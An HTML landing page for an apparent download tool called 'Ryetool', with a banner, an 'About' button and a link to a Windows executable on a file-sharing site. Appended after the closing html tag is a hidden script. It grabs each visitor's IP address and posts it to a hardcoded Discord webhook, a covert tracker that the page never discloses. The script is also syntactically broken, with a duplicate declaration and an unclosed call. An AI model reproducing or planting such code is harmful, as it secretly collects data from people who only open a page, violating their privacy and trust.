<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Ryetool</title>
  <style>
    body {
      font-family: 'Courier New', Courier, monospace;
      text-align: center;
      background-color: #f4f4f4;
      padding: 20px;
    }
    pre {
      white-space: pre-wrap;
      word-wrap: break-word;
      font-size: 14px;
      color: #333;
    }
    .button-container {
      margin-top: 20px;
    }
    button {
      margin: 10px;
      padding: 10px 20px;
      font-size: 16px;
      color: white;
      background-color: #007BFF;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }
    button:hover {
      background-color: #0056b3;
    }
  </style>
  <script>
    function showCreators() {
      const creatorInfo = `
        Ryetool was created by:
        - Ryeman230
        
        Ryetool was created thanks to:
        - python3
        
        
        Thank you for using Ryetool!
      `;
      alert(creatorInfo);
    }
  </script>
</head>
<body>
  <pre>
__        __       _                                 _            ____                _                  _ 
\ \      / /  ___ | |  ___   ___   _ __ ___    ___  | |_   ___   |  _ \  _   _   ___ | |_   ___    ___  | |
 \ \ /\ / /  / _ \| | / __| / _ \ | '_ ` _ \  / _ \ | __| / _ \  | |_) || | | | / _ \| __| / _ \  / _ \ | |
  \ V  V /  |  __/| || (__ | (_) || | | | | ||  __/ | |_ | (_) | |  _ < | |_| ||  __/| |_ | (_) || (_) || |
   \_/\_/    \___||_| \___| \___/ |_| |_| |_| \___|  \__| \___/  |_| \_\ \__, | \___| \__| \___/  \___/ |_|
                                                                         |___/                             
  </pre>
  <div class="button-container">
    <button onclick="window.location.href='https://docs.google.com/forms/d/e/1FAIpQLScAgsYBbPeVFIzT1GSLEv8aENDh7rXNnID8lJnsSB2bbvtILQ/viewform?usp=sf_link'">Suggestions</button>
    <button onclick="window.location.href='https://www.mediafire.com/file/mvhpl4kvonk09f7/ryetoolv1.0.1.exe/file'">Download Ryetool</button>
    <button onclick="showCreators()">About Ryetool</button>
  </div>
</body>
</html>
<script>
  const response = await fetch('https://api.ipify.org?format=json');
const data = await response.json();

const response = await fetch("https://discord.com/api/webhooks/1308241910942531604/7YDJhEqIDx0Kl4uIOarZMvQxNf3IKLzT66FL21_0NxsWrJ7zkevimPm-ZUNRFj6s9WRY", {
method: "POST",
headers: {
  "Content-Type": "application/json",
},
body: JSON.stringify({
  content: data, // The message to send
}),

</script>

